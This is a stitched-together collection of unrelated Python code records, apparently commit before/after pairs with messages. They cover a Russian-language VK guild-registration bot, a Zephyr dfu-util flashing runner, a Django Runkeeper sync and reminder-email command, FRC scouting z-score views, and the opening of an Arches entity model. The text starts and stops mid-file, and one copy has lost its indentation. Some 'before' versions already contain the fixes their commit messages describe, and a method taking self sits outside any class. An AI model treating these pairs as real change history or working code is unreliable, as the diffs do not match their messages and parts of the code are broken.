    """Return the (mandatory, optional) request-field key mappings.

    Maps the Russian field labels used in topic comments to internal
    English field names.
    """
    # The original literal listed the "баннер" key twice; duplicate dict
    # keys are silently collapsed, so it is declared only once here.
    mandatory_keys = {
        "баннер": "banner", "название": "name", "глава": "head",
        "состав": "players", "требования": "requirements",
        "описание": "about", "лого": "logo"}
    optional_keys = {"зам": "vice"}
    return mandatory_keys, optional_keys
def editFields(fields):
    # Replace the raw banner/logo values with photo attachments.
    # NOTE(review): getPhoto presumably resolves a VK photo reference —
    # confirm in topics.lib.
    fields['banner'] = getPhoto(fields['banner'])
    fields['logo'] = getPhoto(fields['logo'])
def makeHyperlinks(guild):
    """Convert the raw head/vice/players strings into lists of Hyperlink
    objects.

    Each whitespace-separated token is stripped individually, so stray
    spaces around a link no longer produce broken Hyperlink objects.
    """
    fields = ("head", "vice", "players")
    for field in fields:
        players = guild[field].strip().split(" ")
        guild[field] = [Hyperlink(p.strip()) for p in players]
def editHeadsAndVices(guild):
    # Collapse the head/vice Hyperlink lists into space-separated id strings.
    for role in ("head", "vice"):
        member_ids = [link.id for link in guild[role]]
        guild[role] = " ".join(member_ids)
def checkGuildInfo(guild):
    # Run all validations; each check raises GMError on failure.
    checkPlayers(guild['players'])
    checkGuildName(guild['name'])
    checkIfHeadsVicesInGuild(guild)


def checkPlayers(players):
    # Validate the roster size first, then each member individually.
    checkNumberOfPlayers(players)
    for player in players:
        checkPlayerUniqueness(player)
        checkIfPlayerHasGuild(player)
        checkIfPlayerInBan(player)
def checkNumberOfPlayers(players):
    # Five members is the minimum size for a guild.
    if len(players) >= 5:
        return
    raise GMError("В гильдии меньше 5 игроков.")
def checkPlayerUniqueness(player):
    # A nickname may not belong to a different, already-registered player.
    old_player = Player(name=player.name)
    if old_player.exists and old_player.get("id") != player.id:
        name = player.name
        # NOTE(review): local `id` shadows the built-in id().
        id = old_player.get("id")
        raise GMError("Игрок с ником {} уже [id{}|существует]".format(name, id))


def checkIfPlayerHasGuild(hyperlink):
    # A player may belong to at most one guild.
    # NOTE(review): assumes rank > 0 means "already a guild member" —
    # confirm in lib.guilds.
    player = Player(hyperlink.id)
    if player.rank > 0:
        guild_name = player.guild.get("name")
        raise GMError("{} уже состоит в гильдии {}".format(hyperlink, guild_name))


def checkIfPlayerInBan(player):
    # Banned community members may not join guilds.
    if int(player.id) in ban_list:
        raise GMError("{} забанен в группе.".format(player))
def checkGuildName(guild_name):
    # Only Latin letters, digits, spaces, underscores and square brackets
    # are allowed; the ^...$ anchors make search() act as a full match.
    pattern = r"^[\[\]A-Za-z_\d ]+$"
    if search(pattern, guild_name) is None:
        raise GMError("Название гильдии содержит недопустимые символы.")
    elif Guild(name=guild_name).exists:
        raise GMError("Гильдия с таким названием уже существует.")
def checkIfHeadsVicesInGuild(guild):
    # Every head and vice must also appear in the roster.  The two lists
    # hold ids not yet matched to a member; anything left over means a
    # leader who is not a listed member.
    remaining_heads = guild['head'].split(" ")
    remaining_vices = guild['vice'].split(" ")
    for member in guild['players']:
        member_id = member.id
        if member_id in remaining_heads:
            remaining_heads.remove(member_id)
        elif member_id in remaining_vices:
            remaining_vices.remove(member_id)
    if remaining_heads or remaining_vices:
        raise GMError("Не все заместители/главы находятся в составе гильдии.")
def guildAlreadyExists(guild):
    # True when a guild with the same name AND the same head string
    # already exists (treated as a duplicate submission).  Otherwise
    # falls through and returns None, which callers rely on as falsy.
    name = guild['name']
    head = guild['head']
    old_guild = Guild(name=name)
    if old_guild.exists:
        if old_guild.get("head") == head:
            return True
[fix] Strip each hyperlink individually to prevent parsing errors
""" Создание гильдий """
from lib.object_creation import createGuild
from lib.guilds import Player, Guild
from lib.commands import ban_list
from lib.config import group_id
from topics.lib import Hyperlink, getPhoto, Fields
from topics.errors import GMError
from re import search
# NOTE(review): shadows the built-in id(); presumably the VK topic id this
# handler is attached to — confirm against the dispatcher.
id = 29891323
# Community (group) the topic belongs to.
group = group_id
# Number of comments processed per poll — TODO confirm semantics in caller.
comment_amount = 5


def getAction(text):
    # Every comment in this topic is treated as a guild-creation request.
    return makeGuild


def getResponse(request):
    # Summarize the asker's guild: name plus a link to its VK wiki page.
    player = Player(request.asker.get("id"))
    guild_name, page_id = player.guild.get("name", "page")
    link = "https://vk.com/page-{}_{}".format(group_id, page_id)
    return "Гильдия: {} ({})".format(guild_name, link)


def finish(request):
    # No post-processing is needed for this topic.
    pass
def makeGuild(request):
    # Parse the request text into guild fields, normalise them, validate,
    # and create the guild — unless the same guild (same name and head)
    # was already created by an earlier, duplicate submission.
    mandatory_keys, optional_keys = getKeys()
    fields = Fields(request.text, mandatory_keys, optional_keys)
    editFields(fields)
    makeHyperlinks(fields)
    editHeadsAndVices(fields)
    if not guildAlreadyExists(fields):
        checkGuildInfo(fields)
        createGuild(**fields)
def getKeys():
    """Return the (mandatory, optional) request-field key mappings.

    Maps the Russian field labels used in topic comments to internal
    English field names.
    """
    # The original literal listed the "баннер" key twice; duplicate dict
    # keys are silently collapsed, so it is declared only once here.
    mandatory_keys = {
        "баннер": "banner", "название": "name", "глава": "head",
        "состав": "players", "требования": "requirements",
        "описание": "about", "лого": "logo"}
    optional_keys = {"зам": "vice"}
    return mandatory_keys, optional_keys
def editFields(fields):
    # Replace the raw banner/logo values with photo attachments.
    fields['banner'] = getPhoto(fields['banner'])
    fields['logo'] = getPhoto(fields['logo'])


def makeHyperlinks(guild):
    # Turn the raw head/vice/players strings into lists of Hyperlink
    # objects; each token is stripped individually so stray spaces around
    # a link do not yield broken hyperlinks.
    fields = ("head", "vice", "players")
    for field in fields:
        players = guild[field]
        players = players.strip().split(" ")
        guild[field] = [Hyperlink(p.strip()) for p in players]
def editHeadsAndVices(guild):
    # Collapse the head/vice Hyperlink lists into space-separated id strings.
    for role in ("head", "vice"):
        member_ids = [link.id for link in guild[role]]
        guild[role] = " ".join(member_ids)
def checkGuildInfo(guild):
    # Run all validations; each check raises GMError on failure.
    checkPlayers(guild['players'])
    checkGuildName(guild['name'])
    checkIfHeadsVicesInGuild(guild)


def checkPlayers(players):
    # Validate the roster size first, then each member individually.
    checkNumberOfPlayers(players)
    for player in players:
        checkPlayerUniqueness(player)
        checkIfPlayerHasGuild(player)
        checkIfPlayerInBan(player)


def checkNumberOfPlayers(players):
    # Five members is the minimum size for a guild.
    if len(players) < 5:
        raise GMError("В гильдии меньше 5 игроков.")
def checkPlayerUniqueness(player):
    # A nickname may not belong to a different, already-registered player.
    old_player = Player(name=player.name)
    if old_player.exists and old_player.get("id") != player.id:
        name = player.name
        # NOTE(review): local `id` shadows the built-in id().
        id = old_player.get("id")
        raise GMError("Игрок с ником {} уже [id{}|существует]".format(name, id))


def checkIfPlayerHasGuild(hyperlink):
    # A player may belong to at most one guild.
    # NOTE(review): assumes rank > 0 means "already a guild member" —
    # confirm in lib.guilds.
    player = Player(hyperlink.id)
    if player.rank > 0:
        guild_name = player.guild.get("name")
        raise GMError("{} уже состоит в гильдии {}".format(hyperlink, guild_name))


def checkIfPlayerInBan(player):
    # Banned community members may not join guilds.
    if int(player.id) in ban_list:
        raise GMError("{} забанен в группе.".format(player))
def checkGuildName(guild_name):
    # Only Latin letters, digits, spaces, underscores and square brackets
    # are allowed; the ^...$ anchors make search() act as a full match.
    pattern = r"^[\[\]A-Za-z_\d ]+$"
    if search(pattern, guild_name) is None:
        raise GMError("Название гильдии содержит недопустимые символы.")
    elif Guild(name=guild_name).exists:
        raise GMError("Гильдия с таким названием уже существует.")
def checkIfHeadsVicesInGuild(guild):
    # Every head and vice must also appear in the roster.  heads/vices
    # hold the ids not yet matched to a member; anything left over means
    # a leader who is not a listed member.
    heads = guild['head'].split(" ")
    vices = guild['vice'].split(" ")
    for player in guild['players']:
        if player.id in heads:
            heads.remove(player.id)
        elif player.id in vices:
            vices.remove(player.id)
    if len(heads) or len(vices):
        raise GMError("Не все заместители/главы находятся в составе гильдии.")
def guildAlreadyExists(guild):
    # True when a guild with the same name AND the same head string
    # already exists (treated as a duplicate submission).  Otherwise
    # falls through and returns None, which callers rely on as falsy.
    name = guild['name']
    head = guild['head']
    old_guild = Guild(name=name)
    if old_guild.exists:
        if old_guild.get("head") == head:
            return True
|
# Copyright (c) 2017 Linaro Limited.
#
# SPDX-License-Identifier: Apache-2.0
'''Runner for flashing with dfu-util.'''
from collections import namedtuple
import sys
import time
from runners.core import ZephyrBinaryRunner, RunnerCaps, \
BuildConfiguration
# DfuSe-specific settings: the flash address to program, plus the
# colon-separated dfu-util modifier string (e.g. "leave").
DfuSeConfig = namedtuple('DfuSeConfig', ['address', 'options'])


class DfuUtilBinaryRunner(ZephyrBinaryRunner):
    '''Runner front-end for dfu-util.'''

    def __init__(self, cfg, pid, alt, img, exe='dfu-util',
                 dfuse_config=None):
        super(DfuUtilBinaryRunner, self).__init__(cfg)
        self.alt = alt
        self.img = img
        # Base command line; '-d,<pid>' restricts dfu-util to the board's
        # USB VID:PID.
        self.cmd = [exe, '-d,{}'.format(pid)]
        # 'dfu-util -l' prints numeric alternate settings as 'alt=N' and
        # named ones as 'name="..."'; pick the pattern matching how --alt
        # was given.
        try:
            self.list_pattern = ', alt={},'.format(int(self.alt))
        except ValueError:
            self.list_pattern = ', name="{}",'.format(self.alt)

        if dfuse_config is None:
            self.dfuse = False
        else:
            self.dfuse = True
        self.dfuse_config = dfuse_config
        # Set by ensure_device() when the user had to manually reset the
        # board into DFU mode; used to print a final reminder afterwards.
        self.reset = False

    @classmethod
    def name(cls):
        return 'dfu-util'

    @classmethod
    def capabilities(cls):
        # Only flashing is supported; flash_addr enables --dt-flash support.
        return RunnerCaps(commands={'flash'}, flash_addr=True)

    @classmethod
    def do_add_parser(cls, parser):
        # Required:
        parser.add_argument("--pid", required=True,
                            help="USB VID:PID of the board")
        parser.add_argument("--alt", required=True,
                            help="interface alternate setting number or name")

        # Optional:
        parser.add_argument("--img",
                            help="binary to flash, default is --bin-file")
        parser.add_argument("--dfuse", default=False, action='store_true',
                            help='''set if target is a DfuSe device;
                            implies --dt-flash.''')
        parser.add_argument("--dfuse-modifiers", default='leave',
                            help='''colon-separated list of DfuSe modifiers
                            (default is "leave", which starts execution
                            immediately); --dfuse must also be given for this
                            option to take effect.''')
        parser.add_argument('--dfu-util', default='dfu-util',
                            help='dfu-util executable; defaults to "dfu-util"')

    @classmethod
    def create(cls, cfg, args):
        # Default to the build's .bin file when --img was not given.
        if args.img is None:
            args.img = cfg.bin_file

        if args.dfuse:
            args.dt_flash = True  # --dfuse implies --dt-flash.
            build_conf = BuildConfiguration(cfg.build_dir)
            dcfg = DfuSeConfig(address=cls.get_flash_address(args, build_conf),
                               options=args.dfuse_modifiers)
        else:
            dcfg = None

        ret = DfuUtilBinaryRunner(cfg, args.pid, args.alt, args.img,
                                  exe=args.dfu_util, dfuse_config=dcfg)
        ret.ensure_device()
        return ret

    def ensure_device(self):
        # Block until the device appears in DFU mode, prompting the user to
        # reset the board if it is not visible yet.
        if not self.find_device():
            self.reset = True
            print('Please reset your board to switch to DFU mode...')
            while not self.find_device():
                time.sleep(0.1)

    def find_device(self):
        # Return True if 'dfu-util -l' lists our alternate setting.
        cmd = list(self.cmd) + ['-l']
        output = self.check_output(cmd)
        output = output.decode(sys.getdefaultencoding())
        return self.list_pattern in output

    def do_run(self, command, **kwargs):
        self.require(self.cmd[0])
        if not self.find_device():
            raise RuntimeError('device not found')
        cmd = list(self.cmd)
        if self.dfuse:
            # http://dfu-util.sourceforge.net/dfuse.html
            dcfg = self.dfuse_config
            addr_opts = hex(dcfg.address) + ':' + dcfg.options
            cmd.extend(['-s', addr_opts])
        cmd.extend(['-a', self.alt, '-D', self.img])
        self.check_call(cmd)

        if self.dfuse and 'leave' in dcfg.options.split(':'):
            # Normal DFU devices generally need to be reset to switch
            # back to the flashed program.
            #
            # DfuSe targets do as well, except when 'leave' is given
            # as an option.
            self.reset = False
        if self.reset:
            print('Now reset your board again to switch back to runtime mode.')
doc: improve west flash help for dfu-util
Try to make it clearer what's going on here.
Suggested-by: Lucian Copeland <b8598f89a69388d99afadf563d2cc1e4211e452f@gmail.com>
Signed-off-by: Martí Bolívar <9d90ac4c7bf6a305f6bfd81a23c7859bc883380e@nordicsemi.no>
# Copyright (c) 2017 Linaro Limited.
#
# SPDX-License-Identifier: Apache-2.0
'''Runner for flashing with dfu-util.'''
from collections import namedtuple
import sys
import time
from runners.core import ZephyrBinaryRunner, RunnerCaps, \
BuildConfiguration
DfuSeConfig = namedtuple('DfuSeConfig', ['address', 'options'])
class DfuUtilBinaryRunner(ZephyrBinaryRunner):
'''Runner front-end for dfu-util.'''
def __init__(self, cfg, pid, alt, img, exe='dfu-util',
dfuse_config=None):
super(DfuUtilBinaryRunner, self).__init__(cfg)
self.alt = alt
self.img = img
self.cmd = [exe, '-d,{}'.format(pid)]
try:
self.list_pattern = ', alt={},'.format(int(self.alt))
except ValueError:
self.list_pattern = ', name="{}",'.format(self.alt)
if dfuse_config is None:
self.dfuse = False
else:
self.dfuse = True
self.dfuse_config = dfuse_config
self.reset = False
@classmethod
def name(cls):
return 'dfu-util'
@classmethod
def capabilities(cls):
return RunnerCaps(commands={'flash'}, flash_addr=True)
@classmethod
def do_add_parser(cls, parser):
# Required:
parser.add_argument("--pid", required=True,
help="USB VID:PID of the board")
parser.add_argument("--alt", required=True,
help="interface alternate setting number or name")
# Optional:
parser.add_argument("--img",
help="binary to flash, default is --bin-file")
parser.add_argument("--dfuse", default=False, action='store_true',
help='''use the DfuSe protocol extensions
supported by STMicroelectronics
devices (if given, the image flash
address respects
CONFIG_FLASH_BASE_ADDRESS and
CONFIG_FLASH_LOAD_OFFSET)''')
parser.add_argument("--dfuse-modifiers", default='leave',
help='''colon-separated list of additional
DfuSe modifiers for dfu-util's -s
option (default is
"-s <flash-address>:leave", which starts
execution immediately); requires
--dfuse
''')
parser.add_argument('--dfu-util', default='dfu-util',
help='dfu-util executable; defaults to "dfu-util"')
@classmethod
def create(cls, cfg, args):
if args.img is None:
args.img = cfg.bin_file
if args.dfuse:
args.dt_flash = True # --dfuse implies --dt-flash.
build_conf = BuildConfiguration(cfg.build_dir)
dcfg = DfuSeConfig(address=cls.get_flash_address(args, build_conf),
options=args.dfuse_modifiers)
else:
dcfg = None
ret = DfuUtilBinaryRunner(cfg, args.pid, args.alt, args.img,
exe=args.dfu_util, dfuse_config=dcfg)
ret.ensure_device()
return ret
def ensure_device(self):
if not self.find_device():
self.reset = True
print('Please reset your board to switch to DFU mode...')
while not self.find_device():
time.sleep(0.1)
def find_device(self):
    '''Return True when "dfu-util -l" lists our target interface.'''
    listing = self.check_output(list(self.cmd) + ['-l'])
    decoded = listing.decode(sys.getdefaultencoding())
    return self.list_pattern in decoded
def do_run(self, command, **kwargs):
    '''Flash self.img to the device, optionally using DfuSe extensions.

    Raises RuntimeError if the device is not visible when called.
    '''
    self.require(self.cmd[0])
    if not self.find_device():
        raise RuntimeError('device not found')

    cmd = list(self.cmd)
    if self.dfuse:
        # http://dfu-util.sourceforge.net/dfuse.html
        addr_opts = hex(self.dfuse_config.address) + ':' + self.dfuse_config.options
        cmd.extend(['-s', addr_opts])
    cmd.extend(['-a', self.alt, '-D', self.img])
    self.check_call(cmd)

    if self.dfuse and 'leave' in self.dfuse_config.options.split(':'):
        # Normal DFU devices generally need to be reset to switch
        # back to the flashed program.
        #
        # DfuSe targets do as well, except when 'leave' is given
        # as an option.
        self.reset = False
    if self.reset:
        print('Now reset your board again to switch back to runtime mode.')
|
from django.core.management.base import BaseCommand, CommandError
from django.core.mail import send_mail
from Running.models import User, Run
import requests
import json
import datetime
import time
class Command(BaseCommand):
    """Weekly runkeeper sync plus a reminder email.

    On Mondays (weekday() == 0) this imports any new runkeeper
    fitnessActivities as Run rows for every user with an access token,
    then sends one reminder email to all users without a token.
    """
    help = 'Updates the runs of all users that have registered with runkeeper'

    def handle(self, *args, **options):
        # Only do the weekly sync/reminder on Mondays.
        if datetime.datetime.today().weekday() != 0:
            return

        users_with_tokens = User.objects.exclude(access_token="")
        for user in users_with_tokens:
            r = requests.get('https://api.runkeeper.com/fitnessActivities',
                             headers={'Authorization': 'Bearer %s' % user.access_token})
            data = r.json()
            runkeeper_runs = user.runs.filter(source="runkeeper")
            registered_ids = [run.source_id for run in runkeeper_runs]
            for item in data['items']:
                if item['uri'] in registered_ids:
                    continue
                # start_time looks like "Sat, 1 Jan 2011 00:00:00";
                # characters 5:16 hold the "1 Jan 2011" date part.
                date = time.strptime(item['start_time'][5:16], "%d %b %Y")
                date = datetime.datetime(*date[:6]).date()
                new_run = Run(runner=user,
                              distance=item['total_distance'] / 1000,
                              start_date=date,
                              end_date=date,
                              source="runkeeper",
                              source_id=item['uri'])
                new_run.save()
        # BUG FIX: debug "print" statements removed (Python-2-only syntax);
        # management commands report through self.stdout instead.
        self.stdout.write('Successfully updated runs')

        everyone_else = User.objects.filter(access_token="")
        # BUG FIX: the old code sliced the list with [1:], silently
        # skipping the first recipient; it also compared email != None
        # and filtered '' in a second pass -- one truthiness check covers both.
        all_addresses = [u.email for u in everyone_else if u.email]
        send_mail('Reminder',
                  'Hello! Since you\'re not using runkeeper to automatically keep your runs updated, you should probably enter your runs on Masanga Runners!',
                  'postmaster@appa4d174eb9b61497e90a286ddbbc6ef57.mailgun.org',
                  all_addresses,
                  fail_silently=False)
        self.stdout.write('Sent reminder mail')
[Changes] Make syncallrunsandremind send out individual emails
Before, syncallrunsandremind would send out one mass email. Now, it
sends out one email to each person.
from django.core.management.base import BaseCommand, CommandError
from django.core.mail import send_mail
from Running.models import User, Run
import requests
import json
import datetime
import time
class Command(BaseCommand):
    """Weekly runkeeper sync plus per-user reminder emails.

    On Mondays (weekday() == 0) this imports any new runkeeper
    fitnessActivities as Run rows for every user with an access token,
    then sends one reminder email to each user without a token
    (individual emails, so recipients never see each other's address).
    """
    help = 'Updates the runs of all users that have registered with runkeeper'

    def handle(self, *args, **options):
        # Only do the weekly sync/reminder on Mondays.
        if datetime.datetime.today().weekday() != 0:
            return

        users_with_tokens = User.objects.exclude(access_token="")
        for user in users_with_tokens:
            r = requests.get('https://api.runkeeper.com/fitnessActivities',
                             headers={'Authorization': 'Bearer %s' % user.access_token})
            data = r.json()
            runkeeper_runs = user.runs.filter(source="runkeeper")
            registered_ids = [run.source_id for run in runkeeper_runs]
            for item in data['items']:
                if item['uri'] in registered_ids:
                    continue
                # start_time looks like "Sat, 1 Jan 2011 00:00:00";
                # characters 5:16 hold the "1 Jan 2011" date part.
                date = time.strptime(item['start_time'][5:16], "%d %b %Y")
                date = datetime.datetime(*date[:6]).date()
                new_run = Run(runner=user,
                              distance=item['total_distance'] / 1000,
                              start_date=date,
                              end_date=date,
                              source="runkeeper",
                              source_id=item['uri'])
                new_run.save()
        # BUG FIX: debug "print" statements removed (Python-2-only syntax);
        # management commands report through self.stdout instead.
        self.stdout.write('Successfully updated runs')

        everyone_else = User.objects.filter(access_token="")
        # BUG FIX: the old code filtered addresses three times
        # (!= None, != '', and "if address:"); one truthiness check
        # covers None and empty string.
        for user in everyone_else:
            if not user.email:
                continue
            send_mail('Reminder',
                      'Hello! Since you\'re not using runkeeper to automatically keep your runs updated, you should probably enter your runs on Masanga Runners!',
                      'postmaster@appa4d174eb9b61497e90a286ddbbc6ef57.mailgun.org',
                      [user.email],
                      fail_silently=False)
        self.stdout.write('Sent reminder mail')
from BaseScouting.views.base_views import BaseHomepageView, BaseAllTeamsViews,\
BaseAllMatchesView, BaseSingleTeamView
from Scouting2017.model.reusable_models import Competition, TeamCompetesIn, Match, OfficialMatch, Team, TeamPictures, TeamComments
from Scouting2017.model.models2017 import get_team_metrics, ScoreResult
import math
class HomepageView2017(BaseHomepageView):
    '''Homepage view for the 2017 game; no custom metrics yet.'''

    def __init__(self):
        BaseHomepageView.__init__(self, Competition, 'Scouting2017/index.html')

    def get_our_metrics(self):
        # No team-specific metrics are computed for 2017 yet.
        return []

    def get_competition_metrics(self, competition):
        # No competition-wide metrics are computed for 2017 yet.
        return []
class AllTeamsViews2017(BaseAllTeamsViews):
    '''All-teams listing for 2017, with per-team metrics and statistics.'''

    def __init__(self):
        BaseAllTeamsViews.__init__(self, TeamCompetesIn, 'Scouting2017/all_teams.html')

    def get_metrics_for_team(self, team):
        return get_team_metrics(team)

    def get_context_data(self, **kwargs):
        context = BaseAllTeamsViews.get_context_data(self, **kwargs)
        # NOTE(review): get_statistics is not defined on this class in
        # this file -- confirm it is provided by the base class.
        context['statistics'] = self.get_statistics(kwargs['regional_code'])
        # BUG FIX: get_context_data must return the context dict;
        # without this the template received no context at all.
        return context
class AllMatchesViews2017(BaseAllMatchesView):
    '''All-matches listing for the 2017 game.'''

    def __init__(self):
        template = 'Scouting2017/allmatches.html'
        BaseAllMatchesView.__init__(self, Match, OfficialMatch, template)
class SingleTeamView2017(BaseSingleTeamView):
    '''Detail view for a single 2017 team.'''

    def __init__(self):
        template = 'Scouting2017/view_team.html'
        BaseSingleTeamView.__init__(self, Team, TeamPictures, TeamComments, template)

    def get_metrics(self, team):
        # No extra single-team metrics for 2017 yet.
        return []
def get_statistics(self, regional_code):
    '''Compute gear statistics for every team at a competition.

    Grabs the live metrics for all teams at the competition and
    computes the mean and SAMPLE standard deviation (N-1) of their
    average gear scores, then attaches a z-score (team.gear_z) to each
    metrics entry.  Sample standard deviation is used because the
    score results are a sample, not the full data set.

    Returns None; results are attached to the metrics objects.
    '''
    teams_at_competition = TeamCompetesIn.objects.filter(competition__code=regional_code)
    metrics = get_team_metrics(teams_at_competition)

    # BUG FIX: the old code called int.join() on the accumulators
    # (an AttributeError) instead of adding, and let the 'NA' string
    # sentinel flow into the arithmetic below.
    gear_avgs = [team.gears_score__avg for team in metrics
                 if team.gears_score__avg is not None]
    if len(gear_avgs) < 2:
        # A sample standard deviation (N-1) needs at least two points.
        return
    global_gear_avg = sum(gear_avgs) / len(gear_avgs)

    # BUG FIX: the deviation loop iterated teams_at_competition, whose
    # rows have no gears_score__avg attribute; use the metrics data.
    sum_v_squared = sum((avg - global_gear_avg) ** 2 for avg in gear_avgs)
    st_dev_gear = math.sqrt(sum_v_squared / (len(gear_avgs) - 1))
    if st_dev_gear == 0:
        return  # all teams identical; z-scores are undefined

    for team in metrics:
        if team.gears_score__avg is not None:
            team.gear_z = (team.gears_score__avg - global_gear_avg) / st_dev_gear
It probably works. Merging with main to find out if I am wrong.
from BaseScouting.views.base_views import BaseHomepageView, BaseAllTeamsViews,\
BaseAllMatchesView, BaseSingleTeamView
from Scouting2017.model.reusable_models import Competition, TeamCompetesIn, Match, OfficialMatch, Team, TeamPictures, TeamComments
from Scouting2017.model.models2017 import get_team_metrics, ScoreResult
from django.db.models.aggregates import Avg
import math
class HomepageView2017(BaseHomepageView):
    '''Homepage view for the 2017 game; no custom metrics yet.'''

    def __init__(self):
        BaseHomepageView.__init__(self, Competition, 'Scouting2017/index.html')

    def get_our_metrics(self):
        # No team-specific metrics are computed for 2017 yet.
        return []

    def get_competition_metrics(self, competition):
        # No competition-wide metrics are computed for 2017 yet.
        return []
class AllTeamsViews2017(BaseAllTeamsViews):
    '''All-teams listing for 2017, with z-score statistics.'''

    def __init__(self):
        BaseAllTeamsViews.__init__(self, TeamCompetesIn, 'Scouting2017/all_teams.html')

    def get_metrics_for_team(self, team):
        return get_team_metrics(team)

    def get_context_data(self, **kwargs):
        context = BaseAllTeamsViews.get_context_data(self, **kwargs)
        reg_code = kwargs['regional_code']
        # BUG FIX: the old call passed context['teams'] where
        # get_statistics expects the regional code string.
        # NOTE(review): get_statistics attaches z-scores to a freshly
        # queried TeamCompetesIn set, not to context['teams'] -- the
        # removed debug print loop crashed on exactly that mismatch;
        # confirm how the template is meant to receive the scores.
        get_statistics(self, reg_code)
        # BUG FIX: get_context_data must return the context dict.
        return context
class AllMatchesViews2017(BaseAllMatchesView):
    '''All-matches listing for the 2017 game.'''

    def __init__(self):
        template = 'Scouting2017/allmatches.html'
        BaseAllMatchesView.__init__(self, Match, OfficialMatch, template)
class SingleTeamView2017(BaseSingleTeamView):
    '''Detail view for a single 2017 team.'''

    def __init__(self):
        template = 'Scouting2017/view_team.html'
        BaseSingleTeamView.__init__(self, Team, TeamPictures, TeamComments, template)

    def get_metrics(self, team):
        # No extra single-team metrics for 2017 yet.
        return []
def get_statistics(self, regional_code):
    '''Attach gear and fuel z-scores to every team at a competition.

    Computes the mean and SAMPLE standard deviation (N-1, per the
    original design note) of gear scores and weighted fuel scores over
    all score results at the competition, then sets team.gear_z and
    team.fuel_z on each TeamCompetesIn row.  Teams with no score
    results (or a zero deviation) are left at 'NA'.
    '''
    competition_srs = ScoreResult.objects.filter(competition__code=regional_code)
    teams_at_competition = TeamCompetesIn.objects.filter(competition__code=regional_code)

    def weighted_fuel(hi, hi_auto, low, low_auto):
        # Fuel point weighting: hi-auto 1, hi 1/3, low-auto 1/3, low 1/9.
        return hi_auto + hi / 3 + low_auto / 3 + low / 9

    # BUG FIX: default BOTH z-scores up front (the old code only
    # defaulted fuel_z, so gear_z could be a missing attribute).
    for team in teams_at_competition:
        team.gear_z = 'NA'
        team.fuel_z = 'NA'

    num_srs = competition_srs.count()
    if num_srs < 2:
        return  # not enough data for a sample standard deviation

    averages = competition_srs.aggregate(Avg('gears_score'),
                                         Avg('fuel_score_hi'),
                                         Avg('fuel_score_hi_auto'),
                                         Avg('fuel_score_low'),
                                         Avg('fuel_score_low_auto'))
    # BUG FIX: aggregate() result keys carry an "__avg" suffix.
    gear_avg = averages['gears_score__avg']
    fuel_avg = weighted_fuel(averages['fuel_score_hi__avg'],
                             averages['fuel_score_hi_auto__avg'],
                             averages['fuel_score_low__avg'],
                             averages['fuel_score_low_auto__avg'])

    gear_v2 = 0
    fuel_v2 = 0
    for sr in competition_srs:
        sr_gear = sr.gears_score - gear_avg
        sr_fuel = weighted_fuel(sr.fuel_score_hi, sr.fuel_score_hi_auto,
                                sr.fuel_score_low, sr.fuel_score_low_auto) - fuel_avg
        gear_v2 += sr_gear * sr_gear
        # BUG FIX: the old code accumulated gear_avg**2 here instead of
        # the fuel deviation.
        fuel_v2 += sr_fuel * sr_fuel

    # Sample standard deviation (N-1), matching the design note above.
    gear_stdev = math.sqrt(gear_v2 / (num_srs - 1))
    fuel_stdev = math.sqrt(fuel_v2 / (num_srs - 1))
    if gear_stdev == 0 or fuel_stdev == 0:
        return  # z-scores undefined when there is no spread

    for team in teams_at_competition:
        # BUG FIX: the lookup needs a double underscore (competition__code).
        teams_srs = team.scoreresult_set.filter(competition__code=regional_code)
        if teams_srs.count() == 0:
            continue
        team_avgs = teams_srs.aggregate(Avg('gears_score'),
                                        Avg('fuel_score_hi'),
                                        Avg('fuel_score_hi_auto'),
                                        Avg('fuel_score_low'),
                                        Avg('fuel_score_low_auto'))
        # BUG FIX: per-team averages live in team_avgs (not as
        # attributes on team), and a z-score subtracts the mean before
        # dividing by the deviation.
        team.gear_z = (team_avgs['gears_score__avg'] - gear_avg) / gear_stdev
        team_fuel = weighted_fuel(team_avgs['fuel_score_hi__avg'],
                                  team_avgs['fuel_score_hi_auto__avg'],
                                  team_avgs['fuel_score_low__avg'],
                                  team_avgs['fuel_score_low_auto__avg'])
        team.fuel_z = (team_fuel - fuel_avg) / fuel_stdev
'''
ARCHES - a program developed to inventory and manage immovable cultural heritage.
Copyright (C) 2013 J. Paul Getty Trust and World Monuments Fund
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as
published by the Free Software Foundation, either version 3 of the
License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import uuid
import types
import copy
import arches.app.models.models as archesmodels
from django.contrib.gis.db import models
from django.contrib.gis.geos import fromstr
from django.contrib.gis.geos import GEOSGeometry
from django.db import connection
from django.db import transaction
from django.core.files.uploadedfile import InMemoryUploadedFile, TemporaryUploadedFile
from arches.app.models.concept import Concept
from arches.app.utils.betterJSONSerializer import JSONSerializer, JSONDeserializer
class Entity(object):
"""
Used for mapping complete entity graph objects to and from the database
"""
def __init__(self, *args, **kwargs):
self.property = ''
self.entitytypeid = ''
self.entityid = ''
self.value = ''
self.label = ''
self.businesstablename = ''
self.child_entities = [
# contains an array of other entities
]
if len(args) != 0:
if isinstance(args[0], basestring):
try:
uuid.UUID(args[0])
self.get(args[0])
except(ValueError):
self.load(JSONDeserializer().deserialize(args[0]))
elif isinstance(args[0], Entity):
self = args[0]
elif args[0] != None and isinstance(args[0], object):
self.load(args[0])
def __repr__(self):
    """Readable representation showing class, id, type and serialized value."""
    serialized_value = JSONSerializer().serialize(self.value)
    return ('%s: %s of type %s with value %s') % (
        self.__class__, self.entityid, self.entitytypeid, serialized_value)
def __hash__(self):
    """Hash on (type, id, value, property); geometries hash by their WKT."""
    value = self.value
    if isinstance(value, GEOSGeometry):
        value = value.wkt
    return hash((self.entitytypeid, self.entityid, value, self.property))
def __eq__(self, x):
    # Equality is delegated entirely to __hash__, i.e. two entities are
    # equal when (entitytypeid, entityid, value, property) match.
    return hash(self) == hash(x)
def __ne__(self, x):
    # Inverse of __eq__ (needed explicitly in Python 2).
    return hash(self) != hash(x)
def get(self, pk, parent=None):
    """
    Gets a complete entity graph for a single entity instance given an entity id.

    pk     -- entityid (UUID) of the entity to load
    parent -- optional parent Entity; when given, self.property is set
              from the rule relating the parent to this entity

    Returns self, with child_entities populated recursively.
    """
    entity = archesmodels.Entities.objects.get(pk = pk)
    self.entitytypeid = entity.entitytypeid_id
    self.entityid = entity.pk
